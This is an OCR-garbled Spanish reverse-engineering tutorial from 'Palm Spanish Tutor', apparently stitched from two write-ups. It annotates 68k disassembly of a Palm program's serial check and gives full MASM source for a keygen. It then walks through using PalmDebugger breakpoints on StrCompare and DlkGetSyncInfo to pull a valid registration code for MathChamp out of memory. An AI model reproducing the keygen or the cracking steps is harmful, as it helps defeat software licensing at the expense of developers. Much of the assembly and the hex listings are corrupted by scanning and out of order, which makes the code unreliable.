

. 
14 


. 
, 


El equivalente a ext.w 


El mismo que antes pero 


code0001:00000638 ext.l al 

code0001:0000063A divs.w d0,dl ¿ DIVS = IDIV. en este 
Casi si Dl es AX entonces IDIV DO 

code0001:0000063€C move.l1  d1,d0 mov d0,dl 
code0001:0000063E swap d0 swap Intercambiar las 
palabras en un determinado registro 

code0001:00000640 move.b  d0, (al,d5.w) mover byte ptr [al+d5],d0 
code0001:00000644 addq.w  +1,d5 inc d5 
code0001:00000646 lea $2A0 (al), Dirección del serial 
generado en a0 

code0001:0000064A subqg.w +1,a0 SUB A0,1 
code0001:0000064C pea (a0,d5.w) Este pone el caracter a 
la posición d5 de la cadena a a0 

code0001:00000650 bsr sub_0_594 Slatar a la subrutina 
que convierte a números ascii 

code0001:00000654 addg.w  +t4,sp corrección de la pila 
code0001:00000656 addq.w  +1,d3 incrementar d3 | inc d3 
code0001:00000658 subq.w  +1,d4 decrementar d4 | dec d4 
code0001:0000065A cmp . w d3,d6 contador = longitud? | 
cmp d6,d3 

code0001:0000065€ bgt.s loc_0_620 Es d4 nulo 6 0 ? | cmp 
d4,0 or cmp d4,NULL 

code0001:0000065E 

code0001:0000065E loc_0_65E: CODE XREF: sub_0_5CC+52. 
code0001:0000065E sub_0_5CC+56.] 
code0001:0000065E tst d”7 da7 nulo? 
code0001:00000660 beg.s loc_0_692 Si, salta a hacer la 
comparación | JZ En alguna parte 

code0001:00000662 lea $2A0 (al), lea al, Real Serial 
code0001:00000666 lea S9EO0 (al), lea esi,UserName 
code0001:0000066A move.b  (a0),d0 Mover un caracter de 
user name a d0 

code0001:0000066C ext .w d0 

code0001:0000066É move.b -1(a0,d6.w),dl mov dl,byte ptr [a0+d6-1] 
code0001:00000672 ext .w al dl = bx 
code0001:00000674 ext.l d0 dO = ax 
code0001:00000676 divs.w dl1,d0 IDIV BX 
code0001:00000678 move.l1  d0,dl mov dl1,d0 
code0001:0000067A swap dl 

code0001:0000067C move.b dl, (al,d5.w) mov word ptr[al+d5],dl 
code0001:00000680 addq.w  +1,d5 inc d5 
code0001:00000682 lea $2A0 (al), lea a0, variable 
code0001:00000686 subqg.w  +1,a0 dec a0 
code0001:00000688 pea (a0,d5.w) Pon el caracter a la 
posición d5 de la cadena a a0 

code0001:0000068C bsr sub_0_594 Saltar a la subrutina 
ascii 

code0001:00000690 addg.w  +t4,sp corrección de la pila 
code0001:00000692 

code0001:00000692 loc_0_692: CODE XREF: sub_0_5CC+94.3 
code0001:00000692 lea $2A0 (a4),a2 Nuestro seial en a2 
code0001:00000696 alt (a2,0d5.w) Añadir caracter nulo | 


move byte ptr [a2+a5],0 


serial 


. 
, 


14 


. 
14 


. 
14 


14 


. 
14 


. 
, 


Ponlo 


Correción de la pila 
La longitud es de 8 ? | 


JLE en algún lugar 


Conseguir 


su longitud 


Cambiar 1 a la derecha | 


copiar a d3 | mov d3,d0 
Sumar 1 a d3 | inc d3 
caracteres solo en d3 


add esp, 1 


CODE XREF: 


sub_0_5CC+DC.]3 


Serial introducido en a0 
Pon esa dirección pero 


serial generado 


d0 is 0? | cmp d0,0 


Ramificar si no es igual 
RegFlag colocar! | mov 
CODE XREF: sub_0_5CC+30.3 


sub_0_5CC+46.3 
var_18(a6),d3-d7/a2 


CODE XREF: 


sub_0_5CC+84.p 


Mover al parametro de la 


mov d0,a0 
cmp d0,10 


JLE en algún lado 


CODE XREF: 


shr d0,1 

mov a0,d0 
cmp a0,10 
JA seguir 


CODE XREF: 


xor d0,d0 
mov d0,a0 


sub_0_594+18.3 


cambio 


sub_0_594+E.3 


code0001:0000069A pea $2A0 (a!) 
code0001:0000069E systrap StrLen () 
code0001:000006A2 addg.w  +t4,sp 
code0001:000006A4 cmpi.w  +8,d0 

cmp d0, 8 

code0001:000006A8 bls.s loc_0_6BE 
code0001:000006AA pea $2A0 (a!) 
code0001:000006AEÉ systrap StrLen () 
code0001:000006B2 lsr.w +1,d0 

shr d0,1 

code0001:000006B4 move.w  dA0,d3 
code0001:000006B6 addq.w  +1,d3 
code0001:000006B8 clr.b (a2,d3.w) 
username un carácter nulo por añadir en nuestro serial | mov byte ptr [a2+d3],0 
code0001:000006BC addg.w  +4,sp 
code0001:000006BE 

code0001:000006BE loc_0_6BE: 

code0001:000006BE lea $560 (a4),a0 
code0001:000006C2 pea 2(a0) 
primero increméntalo por 2 este punto es nuestro 
code0001:000006C6 pea $2A0 (al) 
code0001:000006CA systrap StrCompare () 
code0001:000006CE tst.w d0 
code0001:000006DO0 bne.s loc_0_6D8 
Chico malo | JNZ Mal chico 

code0001:000006D2 move.w  +1,$28 (al) 
d4,1 

code0001:000006D8 

code0001:000006D8 loc_0_6D8: 

code0001:000006D8 

code0001:000006D8 movem.l 
code0001:000006DÉ unlk a6 
code0001:000006E0 TES 
code0001:000006E0 ; End of function sub_0_5CC 
code0001:00000594 proc sub_0_594() 
code0001:00000594 link a6, +0 
code0001:00000598 movea.l arg_0(a6),a0 
primera posición (Un caracter) a a0 
code0001:0000059C move.b  (a0),d0 
code0001:0000059E cmpi.b  +$A,d0 
code0001:000005A2 bls.s loc_0_5AE 
code0001:000005A4 

code0001:000005A4 loc_0_5A4: 

code0001:000005A4 lsr.b $1,d0 
code0001:000005A6 move.b  d0, (a0) 
code0001:000005A8 cmpi.b  +$A,d0 
code0001:000005AC bhi.s loc_0_5A4 
code0001:000005AE 

code0001:000005AE loc_0_5AE: 

code0001:000005AE clr.w rel0 
code0001:000005B0O move.b  (a0),d0 
code0001:000005B2 move.w dA0,dl 


mov d1,d0 


code0001:000005B4 moveq FSA, d2 ¿ mov d2,0ah 


code0001:000005B6 andi.l1l FSFFFF,dl ; and d1,Offffh 
code0001:000005BC divu.w da2,dl ; De dl donde AX este va a 
ser DIV d2 

code0001:000005BE move.l1  d1,d0 ¿ mov d0,dl 
code0001:000005C0 swap d0 

code0001:000005C2 ori.b +$30,d0 ; 'O' ; OR d0,30h 
code0001:000005C6 move.b  d0, (a0) ¿ mov a0,d0 
code0001:000005C8 unlk a6 ; leave (salir) 
code0001:000005CA rts ¿ ret (terminar) 


code0001:000005CA ; End of function sub_0_594 


Después de un poco de lucha haremos un keygen en Win32Asm. Este es el código fuente. 
By Latigo . 


.386 
.MODEL FLAT, STDCALL 
option casemap :none 


include imasm32lincludewindows.inc 
include Iimasm321Xincludeluser32.inc 
include imasm32lincludelkernel32.inc 


includelib Imasm321l1liblkernel32.1lib 
includelib Iimasm321libluser32.1lib 


WinMain PROTO hInst:HINSTANCE, hPrevInst : HINSTANCE, CmdShow: SDWORD 
. CONST 


IDKEYGEN EQU 1000 
IDC_USERNAME EQU 1001 
IDC_SERIAL EQU 1002 
IDM_ABOUT EQU 1 
ID_ABOUTCLOSE EQU 2 

SMALLICON EQU 103 


.DATA 


MainDl1gName DB "IDD_DIALOG1",0 

AboutDlgName DB "IDD_ABOUTDIALOG",0 

Titulo DB "Yerly KeyGenerator by Latigo/UCEr",0 
NotEnufíCharsMsg DB "Longitud del Username's debe ser menor de 3 
caracteres!",0 


HexFormatter DB "$S+04x",0 
DecFormatter DB "Sa",0 
StringFormatter DB "Shs",0 
.DATA? 


hInstance DWORD  ? 


UserSerial DB 255 DUP (2?) 
RealSerial DB 255 DUP (2?) 


. CODE 
start: 
INVOKE GetModuleHandle, NULL 
MOV hInstance,EAX 
INVOKE WinMain, hInstance, NULL, SW_SHOWDEFAULT 
INVOKE ExitProcess,EAX 
WinMain proc hInst:HINSTANCE,hPrevInst : HINSTANCE, CmdShow : SDWORD 
MOV EAX, OFFSET DlgProc 
INVOKE DialogBoxParam, hInst, OFFSET MainDl1gName,NULL, EAX, NULL 
RET 


WinMain endp 


DlgProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM 


LOCAL D5: WORD 


LOCAL D3: WORD ¡ ptr para un carácter 
LOCAL D4: WORD ¿ ptr para un carácter 
LOCAL D6: WORD ¿ Contiene la longitud del UserName's 


LOCAL D”7: WORD 


MOV  EAX,uMsg 


CMP EAX, WM_CLOSE 
JZ _close 


CMP EAX, WM_INITDIALOG 
JZ _initdialog 


CMP EAX, WM_COMMAND 
JZ _ command 

xor EAX,EAX 

RET 


_close: 


INVOKE ExitProcess,0 
RET 


_initdialog: 
INVOKE LoadlIcon,hInstance, SMALLICON 
INVOKE SendMessage, hWnd, WM_SETICON, ICON_SMALL,EAX 
RET 


command: 


MOV EAX, wParam 


CMP EAX, IDKEYGEN 
JZ KeyGenlIt 


CMP AX, IDM_ABOUT 
JZ _about 


RET 


_about: 

MOV EAX, OFFSET AboutDlgProc 

INVOKE DialogBoxParam, hInstance, OFFSET AboutDlgName, NULL, EAX, NULL 
RET 


KeyGenlIt: 
INVOKE GetDlglItemText,hWnd, IDC_USERNAME, OFFSET UserSerial,255 
INVOKE 1strlen, OFFSET UserSerial 


CMP EAX,2 
JLE NotEnuffChars 


MOV D6,AX 
SHR AX, 0FH 
ADD AX,D6 
MOV BX,AX 
SHR BX,1 
MOV CX,BX 
MOV AX,CX 
ADD AX,CX 
MOV BX,D6 
SUB BX,AX 
MOV DX,CX 
SUB DX,1 
MOV D5,0 
MOV D7,BX 
MOV D4,CX 
MOV D3,DX 
CMP DX,D6 
JZ Mentira 


LEA EDI,RealSerial 
LEA ESI,UserSerial 
XOR EAX, EAX 
XOR EBX,EBX 
XOR EDX, EDX 


NextChars: 

CMP D4,0fffífh ; (or NULL) 
JZ Mentira 

MOV DX,D3 

MOV AL,BYTE PTR [ESI+EDX] 


MOV DX,D4 

MOV BL,BYTE PTR [ESI+EDX] 
XOR EDX, EDX 

IDIV BX 

PUSH EDX 

CALL AddlIt 

XOR ECX,ECX 

MOV CX,D5 

MOV BYTE PTR [EDI+ECX],DL 
INC D3 
MOV AX,D3 

MOV BX,D6 

CMP AX, BX 

JZ MentiralaMentiraMentiralaVerdad 
INC D5 

DEC D4 

JMP NextChars 


Mentira: 

CMP D7, OFFFFH 

JZ MentiralaMentiraMentiralaVerdad 
XOR EAX, EAX 

XOR EBX,EBX 

LEA ESI,UserSerial 

MOV AL,BYTE PTR [ESI] 

XOR EDX, EDX 

MOV DX,D6 

MOV BL,BYTE PTR [ESI+EDX-1] 
XOR EDX, EDX 

IDIV BX 

PUSH EDX 

CALL AddlIt 

XOR ECX, ECX 

MOV CX,D5 

MOV BYTE PTR [EDI+ECX],DL 


MentiraLaMentiraMentiraLaVerdad: 
LEA ESI,RealSerial 

XOR EAX, EAX 

MOV AX,D5 

INC AX 

ADD ESI,EAX 

MOV BYTE PTR [ESI],NULL 

INVOKE 1strlen, OFFSET RealSerial 
CMP EAX, 8 

JLE NoNeedToChop 

SHR EAX, 1 

LEA ESI,RealSerial 

ADD ESI,EAX 

ADD ESI,1 

MOV BYTE PTR [ESI],NULL 


NoNeedToChop: 
INVOKE SetDlglItemText,hWnd, IDC_SERIAL, OFFSET RealSerial 
RET 


NotEnuffíChars: 
INVOKE MessageBox,0,OFFSET NotEnuffCharsMsg,0,MB_OK 
RET 


DlgProc endp 
AddlIt PROC Char: DWORD 


CMP DL,10 

JLE EsMenorADiez 
Go0nShifting: 
SHR DL, 1 

CMP DL,10 

JA Go0nShifting 
EsMenorADiez: 
MOV BX,10 

MOV AL,DL 

XOR DX,DX 

DIV BX 

OR DL,30H 

RET 


AddlIt ENDP 


AboutDlgProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM 
MOV  EAX,uMsg 


CMP EAX, WM_CLOSE 
JZ about_close 


CMP EAX, WM_COMMAND 
JZ about_command 


xor EAX,EAX 
RET 


about_close: 
INVOKE EndDialog,hWnad, 0 
RET 


about_command: 

MOV EAX, wParam 

CMP EAX, ID_ABOUTCLOSE 
JZ about_close 

RET 


AboutDlgProc ENDP 


END start 


The end. 


Palm Spanish Tutor: Pagina dedicada a la divulgación de información en Castellano, sobre 


Ingeniería Inversa y Programación en Palm. E-mail "Colabora con tus Proyectos" 


Palm Spanish Tutor 


| Protección: |(x)Serial (()HotSync/ Code (X)Trial ( )Multiprotección ()Encriptado ( )Otro 


INTRODUCCION 


Cargamos primero el emulador y el programa víctima, después procedemos a cargar el PalmDebugger 3.6 en 
mi caso. Después analizamos e intentamos descubrir el tipo de protección , intentando registrarlo a ver que 
pasa vemos que se nos muestra una ventana de alerta una llamada TALT (MessageBox en Windows Softlce). 


Encontramos la alerta 1008 0x3F0 Para "Thank you for registering ! Enjoy Playing MathChamp! 


Y Para la alerta 1009 0x3F1 para "This registration code is not valid for this device." 


AL ATAQUE 
PROPUESTA 1: Encontrar un serial 


Desensamblamos parte del programa víctima con el Palmdemon 0.27 y obtenemos este trozo de código. y guardamos el 
desensamblado en una archivo con extensión *.txt, Procedemos a buscar una alerta en este caso abrimos el archivo 
desensamblado con Ultraedit32 10a y buscamos la cadena 3F0 cercana una API, Esto es lo que veremos: 


000087AD 63 30 BLS.S $87DF 

000087AF 32 2E FF FE MOVE.W SVAR_02, D1 
000087B3 52 41 ADD.W +$1, D1 

000087B5 70 00 MOVE.L +50, DO 

000087B7 30 01 MOVE.W D1, DO 

000087B9 41 EE FF CO LEA.L SVAR_40, AO 
000087BD 36 2E FF F8 MOVE.W WVAR_08, D3 
000087C1 32 03 MOVE.W D3, D1 

000087C3 78 OA MOVE.L +SA, D4 

00008705 02 81 00 00 FF.. AND.L +S0000FFFF, D1 
000087CB 82 C4 DIVU.W D4, D1 

000087CD 24 01 MOVE.L D1, D2 


000087CF 
000087D1 
000087D3 
000087D5 
000087D9 
000087DD 
000087E1 
000087E5 
000087E9 
000087ED 
000087EF 
000087F1 
000087F7 
000087F9 
000087FB 
000087FD 
000087FF 
00008801 
00008805 
00008809 
0000880D 
00008811 
00008813 
00008817 
0000881B 


loc_881F: 


0000881F 
00008823 
00008825 
00008827 
00008829 
0000882D 
0000882F 
00008831 
00008833 


X-ref to 


00008837 
0000883B 
0000883D 
00008841 
00008843 
0000884B 
0000884F 
00008851 
00008855 


loc_8859: 


00008859 


X-ref to 


0000885D 
00008861 


loc_8863: 


00008863 
00008867 
0000886B 
0000886D 
0000886F 
00008871 
00008873 
00008875 
00008879 
0000887F 


loc_8881: 


48 
12 
06 
00 
08 
00 
30 
41 
36 
32 
78 
02 
82 
24 
48 
12 
06 
00 
08 
00 
1D 
FF 
42 
32 
60 


2F 
70 
DO 
2F 
4E 
50 
4A 
66 
3F 


42 
02 
01 
30 
00 
2A 
2E 
EE 
2E 
03 
OA 
81 
C4 
01 
42 
02 
01 
30 
00 
2D 
70 
C6 
2E 
6E 
00 


2E 
CO 
8E 
00 
4F 
8rF 
40 
26 
3C 


Alert 


4E 
54 
43 
20 
21 
43 
20 
30 
60 


3F 


4F 
8rF 
ED 
49 
70 
ED 
49 
BC 
00 


3C 


Alert 


4E 
54 


26 
28 
4E 
4E 
45 
70 
72 
20 
25 
13 


4F 
8rF 


2E 
2E 
5E 
75 
78 
69 
65 
69 
75 
00 


PEA.L D2 

MOVE.B D2, D1 

ADD.B +$1, D1 

11 81 OR.B +$30, $81(A0, D1.w) 
60 00 BTST +0, DO 

70 00 OR.B +$2A, $7000(A2) 

FF FE MOVE.W SVAR_02, DO 

FF CO LEA.L SVAR_40, AO 

FF F8 MOVE.W WVAR_08, D3 
MOVE.W D3, D1 
MOVE.L HSA, D4 
00 00 FF.. AND.L *$0000FFFF, D1 
DIVU.W D4, D1 

MOVE.L D1, D2 
PEA.L D2 
MOVE.B D2, D1 
ADD.B +$1, D1 
11 81 OR.B +$30, $81(A0, D1.w) 
1D 7C BTST +$7C, DO 

FF C3 OR.B +$2D, VAR_3D 

00 2D MOVE.B +$$7C, $2D(A6) 
DC.W +FFC6 

FF CA CLR.B WVAR_36 

FF FE ADD.W +$$1, SVAR_02 

FE D8 BRA LOC_86F5 


00 08 MOVE.L $8(A6), -(A7) 
MOVE.L +$$C0, DO 

DD.L A6, DO 

OVE.L DO, -(A7) 


A 

M 

AO C8 SysTrap StrCompare <-—— Aquí se compara el Fake serial y el verdadero 
ADD.L +4$8, A7 
AN 
B 
0 


ST.W DO 
NE.S LOC_8859 
3 FO MOVE.W +$03F0, —(A7) 


(Registration Confirmed)  <--—-— "Thank you for registering ! Enjoy Playing MathChamp! 


Al 92 SysTrap FrmAlert 

ADD.L $$2, A7 

C6 70 LEA.L VAR_3990, Al 

MOVE.L Al, AO 

35 7A B7.. MOVE.L $357AB7E0, $2(A0) 
C6 42 LEA.L VAR_39BE, Al 

MOVE.L Al, AO 

22 53 MOVE.W +$$2253, (A0) 

00 0C BRA LOC_8863 


03 F1 MOVE.W +$03F1, -(A7) 


(Registration Not Confirmed) <-—-— "This registration code is not valid for this device.' 


Al 92 SysTrap FrmAlert 
ADD.L $2, A7 


FF B8 MOVE.L -$48(A6), D3 

FF BC MOVE.L -$44(A6), D4 

UNLK.L A6 

RTS 

DC.W 44578 

move.l +$69, d0 

move.1l +$65, dl 

6E 20 move.l $6E20(al), a0 

20 44 61.. move.1l $44(a5, d2.w), $6179(a2) 
DC.W 47300 


00008881 4E 56 FF C8 LINK.L A6, +-$38 
00008885 42 2E FF FD CLR.B -$3(A6) 
00008889 4E 4F Al 73 SysTrap FrmGetActiveForm 
0000888D 20 08 MOVE.L AO, DO 

0000888F 2D 40 FF F8 MOVE.L DO, -$8(A6) 
00008893 30 2E 00 08 MOVE.W $8(A6), DO 
00008897 06 40 FC 17 ADD.W $$FC17, DO 
0000889B 0C 40 00 06 CMP.W +$0006, DO 
0000889F 62 00 02 8E BHI LOC_8B2F 
000088A3 72 00 MOVE.L +$0, D1 

000088A5 32 00 MOVE.W DO, D1 

000088A7 20 01 MOVE.L D1, DO 

000088A9 D2 80 ADD.L DO, D1 

000088AB 30 3B MOVE.W S6(PC, D1.W), DO 
000088AD 18 06 MOVE.B D6, D4 

000088AF 4E FB JMP.L $2(PC, DO.W) 
000088B1 00 02 OR.B +$2, D2 

000088B3 00 OE OR.B +SE, A6 

000088B5 00 2A 01 A2 OR.B +$2A, $1A2(A2) 
000088B9 00 5E 02 2A OR.W +$022A, (A6)+ 
000088BD 02 7C 02 60 ANDSR.W $60 
000088C1 42 A7 CLR.L -(A7) 

000088C3 4E 4F Al C1 SysTrap MenuEraseStatus 
000088C7 58 8F ADD.L +54, A7 

000088C9 3F 3C 03 ED MOVE.W +$03ED, -(A7) 


Una vez analizado el código , Que tal si probamos en poner un "atb strcompare" en el palmdebugger 
3.6 a ver que pasa, Para ello cargamos el emulador instalamos el programa victima, cargamos el 
palmdebugger en conexión debemos elegir Emulator, cargado el debugger esto es lo que aparece. 


Initializing parser... 
Initializing lex... 
Installing keywords... 
Initializing eval... 
Initializing exec... 
Loading startup script... 


Deb0ut = false 
SymbolsOn = true 
StepRegs = false 
ReadMemHack = false 
Attached = false 

dot address = 00000000 
last address = 00000000 
last count = 00000000 


att 
EXCEPTION ID = $80 
'"TargetCfgRoutines' 


+S00FO 1018871C *LINK A6,$0000 | 4E56 0000 
atb "strcompare" 

A-trap set on 00c8 (strcompare) 

g 


Con el "g" nos salta al emulador y en el emulador abrimos el programa víctima, Posterior a ello, 
Intentamos registrarnos presionamos cualquier serial, presionamos el botón Ok y se bloquea el 
emulador y nos manda directamente al debugger, Presionamos el comando "il" para saber si 
verdaderamente hemos caido en parte del código del programa victima, para ello revisemos el código 
que mostro el "il" y comparémoslo con el archivo donde tenemos el código desensamblado. 


Esto es lo que muestra el "il" 


11 
00060A2E *_StrCompare ; $1001C2E2 | 4E4F A0C8 

00060A32 ADDO.L +$08,A7 | 508F 

00060A34 TST.W DO | 4A40 

00060A36 BNE.S *+$0028 ; 00060A5EÉ | 6626 

00060A38 MOVE.W +$03F0,-(A7) ; 'p.' | 3F3C 03F0 

00060A3C _FrmAlert ; $10069070 | 4E4F A192 

00060A40 ADDO.L +4$02,A7 | 548F 

00060A42 LEA -$3990(A5),A1 | 43ED C670 

00060A46 MOVE.L A1,A0 | 2049 

00060A48 MOVE.L +$357AB7E0,$0002(A0) ; '5z7'' | 217C 357A B7E0 0002 


Viendo que andamos en las tripas del programa víctima, Que tal si escribimos 


dm a0 
0003B9E6: 37 37 38 2D 31 30 2D 34 30 39 00 00 63 68 75 63 "7"778-10-409..chuc" 


Eso tiene la finta de un serial que tal si salimos del debugger y lo probamos en el emulador, 
Efectivamente ese es el serial, y da la finta de ser un serial unico, Probemos cambiando el nombre 
de HotSync a ver si lo sigue validando. 


Con un nombre Hotsync "Chucky" el serial es "778-10-409" , Pero desgraciadamente no es valido para 
todos los hotsync/names , segun lo verifique al cambiar el nombre del hotsync, Seguramente que el 
programador es un hambriento bastardo. 


PROPUESTA 2:Hacer que valide cualquier serial 


Entrando en la rutina donde se empieza a construir el serial nos encontramos con: Que les parece si 
ahora cargamos el emulador y el debugger y ahora paramos con un 


atb "DlkGetSyncInfo" 


Initializing parser... 
Initializing lex... 
Install ing keywords... 
Initializing eval... 
Initializing exec... 
Loadi ng startup script... 


DebQut = false 

Symbol sOn = true 
StepRegs = false 
ReadWVenHack = false 
Attached = false 

dot address = 00000000 
last address = 00000000 
last count = 00000000 


att 

EXCEPTI ON |D = $80 

' Tar get Cf gRouti nes' 

+$00F0 1018871C *LI NK A6, $0000 | 4E56 0000 
atb "DI kGetSyncl nf o" 

A-trap set on 02a9 (DI kGet Syncl nf o) 


9 

EXCEPTION | D = $80 

000607C6 *_DIkGetSynclnfo ; $100535FA | 4E4F A2A9 
il 

000607C6 *_DI kGetSyncl nfo ; $100535FA | 4E4F A2A9 
000607CA LEA $0018(A7),A7 | 4FEF 0018 


000607CE 
000607D0 
000607D2 
000607D4 
000607D8 
000607DA 
000607DE 
000607E2 
000607E4 
000607E8 
000607EC 
000607FO 
000607F4 
000607F6 
000607FA 
000607FC 
00060800 
00060804 
0006080A 
0006080C 
0006080E 
00060812 
00060816 
0006081C 
0006081E 
00060822 
00060826 
0006082C 
0006082E 
00060830 
00060834 
00060838 
0006083E 
00060840 
00060842 
00060846 
0006084A 
0006084C 
00060850 
00060854 
00060858 
0006085C 
00060860 
00060864 
00060868 
0006086E 
00060872 
00060878 
0006087C 
00060882 
00060884 
00060888 
0006088A 
0006088E 
00060892 
00060894 
00060898 
0006089C 
000608A0 
00060844 
000608A8 
000608AA 
000608AE 
000608B2 
000608B6 
000608B8 
000608BC 
000608BE 
000608C2 
000608C4 
000608C8 
000608CC 
000608CE 
000608D2 


MOVEQ. L ++ $34, DO | 70CC 

ADD. L A6, DO | DO8E 

MOVE. L DO,-(A7) | 2FOO 

_StrLen ; $1001C27E | 4E4F A0C7 
ADDQ. L $04, A7 | 588F 

MOVE. WDO, - $000A(A6) | 3D40 FFF6 
TST. W-$000A(A6) | 4A6E FFF6 

BNE. S *+$0006 ; 000607E8 | 6604 

BRA. W*+$0284 ; 00060A68 | 6000 0282 
CLR. W-$0002(A6) | 426E FFFE 

MOVE. W- $000A(A6), DO | 302E FFF6 
CWP. W-$0002(A6), DO | BOGE FFFE 
BHI.S *+$0006 ; O000607FA | 6204 

BRA. W*+$0072 ; 00060868 | 6000 0070 
MOVEQ. L *t500, DO | 7000 

MOVE. W-$0002(A6),DO | 302E FFFE 
LEA - $0034(A6),A0 | 41EE FFCC 
CWPI. B *t$30, $00(AO, DO.L) ; '0' | 0C30 0030 0800 
BNE. S *+$0012 ; 0006081C | 6610 
MOVEQ. L *t500, DO | 7000 

MOVE. W-$0002(A6),DO | 302E FFFE 
LEA - $0034(A6),A0 | 41EE FFCC 
MOVE. B +$6F, $00(A0, DO.L) ; 'o' | 11BC 006F 0800 
MOVEQ. L *t500, DO | 7000 

MOVE. W-$0002(A6),DO | 302E FFFE 
LEA - $0034(A6),A0 | 41EE FFCC 
CWPI.B *$40, $00(AO, DO.L) ; '(G | 0C30 0040 0800 
BLE. S *+$0034 ; 00060860 | 6F32 
MOVEQ. L *t500, DO | 7000 

MOVE. W-$0002(A6),DO | 302E FFFE 
LEA - $0034(A6),A0 | 41EE FFCC 
CWPI. B *55A, $00(AO, DO.L) ; 'Z | 0C30 005A 0800 
BGT.S *+$0022 ; 00060860 | 6E20 
MOVEQ. L *t500, DO | 7000 

MOVE. W-$0002(A6),DO | 302E FFFE 
LEA - $0034(A6),A0 | 41EE FFCC 

MOVEQ. L *t$00, D1 | 7200 

MOVE. W-$0002(A6),D1 | 322E FFFE 
LEA - $0034(A6),A1 | 43EE FFCC 

MOVE. B $00(A1, Dl. L),D2 | 1431 1800 
ADDI.B *$20,D2 ; ' ' | 0602 0020 
MOVE. B D2, $00(A0, DO.L) | 1182 0800 
ADDQ. W +t$01, - $0002(A6) | 526E FFFE 
BRA. W*-$0078 ; 000607EC | 6000 FF86 
CWPI . W+t$0027, - $0O00A(A6) ; ''.' | OC6E 0027 FFF6 
BH. W*+$0084 ; 000608F2 | 6200 0082 
MOVE. W- $000A( A6), - $0002(A6) | 3D6E FFFG FFFE 
CLR. W-$0004(A6) | 426E FFFC 

CWPI . W+f$0027, - $0002(A6) ; ''.' | OC6E 0027 FFFE 
BLS. S *+$0006 ; 00060888 | 6304 

BRA. W*+$006E ; 000608F2 | 6000 006C 
MOVEQ. L *t500, DO | 7000 

MOVE. W-$0002(A6),DO | 302E FFFE 
LEA - $0034(A6),A0 | 41EE FFCC 

MOVEQ. L *t$00, D1 | 7200 

MOVE. W-$0004(A6), DL | 322E FFFC 
LEA - $0034(A6),A1 | 43EE FFCC 

MOVE. B $00(Al1, Dl. L), D3 | 1631 1800 
ADD. B -$0003(A6),D3 | D62E FFFD 
MOVE. B D3, $00(A0, DO. L) | 1183 0800 
MOVEQ. L **500, DO | 7000 

MOVE. W-$0002(A6),DO | 302E FFFE 
LEA - $0034(A6),A0 | 41EE FFCC 

MOVE. B $00(A0, DO. L), DO | 1030 0800 
EXT. WDO | 4880 

CWPI . W+t$007A, DO ; 'z.' | 0C40 007A 
BHI.S *+$0006 ; 000608C2 | 6204 

BRA. W*+$0028 ; 000608E6 | 6000 0026 
MOVEQ. L *$00, DO | 7000 

MOVE. W-$0002(A6), DO | 302E FFFE 
LEA - $0034(A6),A0 | 41EE FFCC 

MOVEQ. L *t500, Dl | 7200 

MOVE. W-$0002(A6), DL | 322E FFFE 
LEA - $0034(A6),A1 | 43EE FFCC 


000608D6 
000608DA 
000608DE 
000608E2 
000608E6 
000608EA 
000608EE 
000608F2 
000608F6 
000608FA 
00060900 
00060902 
00060906 
0006090A 
0006090E 
00060912 
00060918 
0006091A 
0006091E 
00060920 
00060924 
00060928 
0006092C 
0006092E 
00060932 
00060934 
00060936 
0006093C 
0006093E 
00060940 
00060942 
00060944 
00060946 
00060948 
0006094C 
00060950 
00060952 
00060954 
00060958 
0006095A 
0006095C 
00060962 
00060964 
00060966 
00060968 
0006096C 
00060970 
00060974 
0006097A 
0006097C 
00060980 
00060982 
00060984 
00060986 
0006098A 
0006098E 
00060990 
00060992 
00060998 
0006099A 
0006099C 
0006099E 
000609A0 
00060944 
000609A8 
000609AC 
000609B2 
000609B4 
000609B8 
000609BA 
000609BC 
000609BE 
000609C2 
000609C6 


MOVE. B $00(A1, DL. L), D4 | 1831 1800 
ADDI.B *$9F,D4 ; '.' | 0604 FFOF 
MOVE. B D4, $00(A0, DO.L) | 1184 0800 
BRA. W*-$003A ; 000608A8 | 6000 FFC4 
ADDQ. W $01, - $0002(A6) | 526E FFFE 
ADDQ. W+*$01, - $0004(A6) | 526E FFFC 
BRA. W*-$0072 ; 0006087C | 6000 FF8C 
CLR. B -$000C(A6) | 422E FFF4 

CLR. W-$0002(A6) | 426E FFFE 

CWPI . W+f$0007, - $0002(A6) ; '..' | OC6E 0007 FFFE 
BLS. S *+$0006 ; 00060906 | 6304 

BRA. W*+$0122 ; 00060424 | 6000 0120 
CLR. W-$0004(A6) | 426E FFFC 

CLR. W-$0006(A6) | 426E FFFA 

CLR. W-$0008(A6) | 426E FFF8 

CWPI . W+t$0027, - $0004(A6) ; ''.' | OC6E 0027 FFFC 
BLS. S *+$0006 ; 0006091E | 6304 

BRA. W*+$005A ; 00060974 | 6000 0058 
MOVEQ. L *t500, DO | 7000 
MOVE. W- $0006(A6),DO | 302E FFFA 
LEA - $0034(A6),A0 | 41EE FFCC 

MOVE. B $00(A0, DO. L), DO | 1030 0800 
EXT. WDO | 4880 

MOVE. W- $0004(A6),D3 | 362E FFFC 
MOVE. WD3, Dl | 3203 

MOVEQ. L *S50F, D4 | 780F 

ANDI .L *$0000éFFFF, Dl ; '....' | 0281 0000 FFFF 
DI VU. WD4, Dl | 82C4 

MOVE. L D1, D2 | 2401 

SWAP D2 | 4842 

MOVE. WD2, D3 | 3602 

ADDQ. W $01, D3 | 5243 

AND. WD3, DO | C043 

ADD. W DO, - $0008(A6) | D1GE FFF8 
MOVE. W- $0006(A6),DO | 302E FFFA 
ADDQ. W*$01, DO | 5240 

MOVE. WDO, D2 | 3400 

ADD. W-$0002(A6),D2 | D46E FFFE 
MOVE. WD2, DO | 3002 

MOVEQ. L +t528, D3 | 7628 

ANDI. L *$0000éFFFF, DO ; '....' | 0280 0000 FFFF 
DI VU. W.D3, DO | 80C3 

MOVE. L DO, D1 | 2200 

SWAP Dl | 4841 

MOVE. WD1, - $0006(A6) | 3D41 FFFA 
ADDQ. W+*$01, - $0004(A6) | 526E FFFC 
BRA. W*-$005E ; 00060912 | 6000 FFAO 
CWPI . WX$0004, - $0002(A6) ; '..' | OC6E 0004 FFFE 
BLS. S *+$0032 ; O00609AC | 6330 
MOVE. W-$0002(A6), DL | 322E FFFE 
ADDQ. W $02, Dl | 5441 

MOVEQ. L *t500, DO | 7000 

MOVE. WD1, DO | 3001 

LEA - $0040(A6),A0 | 41EE FFCO 

MOVE. W- $0008(A6),D3 | 362E FFF8 
MOVE. WD3, Dl | 3203 

